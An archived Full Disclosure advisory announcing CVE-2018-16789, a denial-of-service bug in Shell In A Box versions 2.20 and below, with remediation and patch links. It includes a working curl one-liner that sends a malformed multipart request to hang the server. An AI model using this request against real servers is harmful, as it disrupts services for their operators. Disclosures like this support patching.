| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAPWzz4z0nz8ccm_pL27fBAaYrujsGTW6UUDSKMGcO76QACGKZw@mail.gmail.com> Date: Fri, 26 Oct 2018 14:07:31 +0200 From: Imre Rad <radimre83@...il.com> To: fulldisclosure@...lists.org Subject: [FD] CVE-2018-16789: denial of service in shellinabox Product: Shell In A Box (aka shellinabox, shellinaboxd) "Shell In A Box implements a web server that can export arbitrary command line tools to a web based terminal emulator. This emulator is accessible to any JavaScript and CSS enabled web browser and does not require any additional browser plugins. " Most official-ish site: https://github.com/shellinabox/shellinabox Vulnerability description: The multipart/form-data parser function in the built-in webserver of Shell In A Box enters an infinite loop in case of malformed request payload, the server stops serving new requests and the the process eats up 100% of CPU time. Exploitation: curl -v --header "Content-type: multipart/form-data; boundary=------------------------8d14c0216fd84557" -d "impeachment" http://127.0.0.1:4200/s/ Affected Shell In A Box versions: 2.20 and below Remediation: Upgrade to 2.21 Package available in Debian sid: https://packages.debian.org/source/sid/shellinabox Patch: https://github.com/shellinabox/shellinabox/pull/446 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists